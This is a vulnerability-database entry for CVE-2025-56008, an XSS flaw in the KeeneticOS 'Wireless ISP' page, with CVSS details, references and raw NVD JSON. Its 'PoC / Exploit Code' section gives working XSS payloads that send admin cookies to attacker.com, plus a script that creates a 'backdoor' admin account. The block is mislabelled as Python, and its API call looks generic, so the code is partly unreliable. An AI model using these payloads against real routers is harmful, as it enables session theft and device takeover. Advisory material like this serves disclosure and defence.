CVE-2025-56008

Description

Cross site scripting (XSS) vulnerability in KeeneticOS before 4.3 at "Wireless ISP" page allows attackers located near to the router to takeover the device via adding additional users with full permissions.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:o:keenetic:keeneticos:*:*:*:*:*:*:*:* - VULNERABLE

KeeneticOS < 4.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2025-56008 XSS PoC for KeeneticOS Wireless ISP page -->
<!-- This PoC demonstrates injecting malicious JavaScript via Wireless ISP configuration -->

<!-- Basic XSS payload to steal admin cookies -->
<script>
  fetch('https://attacker.com/steal?cookie=' + encodeURIComponent(document.cookie));
</script>

<!-- Alternative payload using img tag for cookie theft -->
<img src=x onerror="fetch('https://attacker.com/steal?cookie=' + encodeURIComponent(document.cookie));">

<!-- Payload to create admin user via KeeneticOS API -->
<script>
  fetch('/usr/a', {
    method: 'POST',
    headers: {'Content-Type': 'application/json'},
    body: JSON.stringify({
      method: 'add_user',
      params: {username: 'backdoor', password: 'P@ssw0rd123', role: 'admin'}
    })
  });
</script>

<!-- Stored XSS payload for persistent access -->
<svg/onload=fetch('https://attacker.com/exfil?data='+btoa(document.cookie))>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-56008
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-56008
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-56008/
[4] VulDB https://vuldb.com/cve/CVE-2025-56008
[5] https://github.com/notdenied/writeups/blob/main/CVE/CVE-2025-56008.md
[6] https://keenetic.com/
[7] https://keenetic.com/global/security#october-2025-web-api-vulnerabilities

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-56008", "sourceIdentifier": "[email protected]", "published": "2025-10-23T15:15:39.213", "lastModified": "2026-05-20T20:16:35.107", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross site scripting (XSS) vulnerability in KeeneticOS before 4.3 at \"Wireless ISP\" page allows attackers located near to the router to takeover the device via adding additional users with full permissions."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:keenetic:keeneticos:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.3", "matchCriteriaId": "31463ACE-A8BB-4E5D-AA71-1BC479DE8AA4"}]}]}], "references": [{"url": "https://github.com/notdenied/writeups/blob/main/CVE/CVE-2025-56008.md", "source": "[email protected]"}, {"url": "https://keenetic.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://keenetic.com/global/security#october-2025-web-api-vulnerabilities", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}